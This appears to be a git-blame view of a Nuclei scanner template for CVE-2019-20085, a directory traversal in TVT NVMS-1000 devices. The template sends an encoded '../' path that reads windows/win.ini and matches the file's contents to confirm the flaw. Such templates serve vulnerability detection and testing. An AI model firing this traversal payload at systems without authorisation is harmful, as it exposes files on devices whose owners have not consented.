my-nuclei-templates/CVE-2019-20085.yaml

32 lines
799 B
YAML
Raw Normal View History

2021-07-20 23:36:53 +00:00
id: CVE-2019-20085
info:
name: TVT NVMS 1000 - Directory Traversal
author: daffainfo
severity: high
description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
2021-09-02 08:03:02 +00:00
reference:
2021-07-20 23:36:53 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085
- https://www.exploit-db.com/exploits/48311
tags: cve,cve2019,iot,lfi
2021-09-17 06:03:58 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2019-20085
cwe-id: CWE-22
2021-07-20 23:36:53 +00:00
requests:
- method: GET
path:
2021-09-02 08:03:02 +00:00
- "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"
2021-07-20 23:36:53 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "\\[(font|extension|file)s\\]"
part: body
- type: status
status:
- 200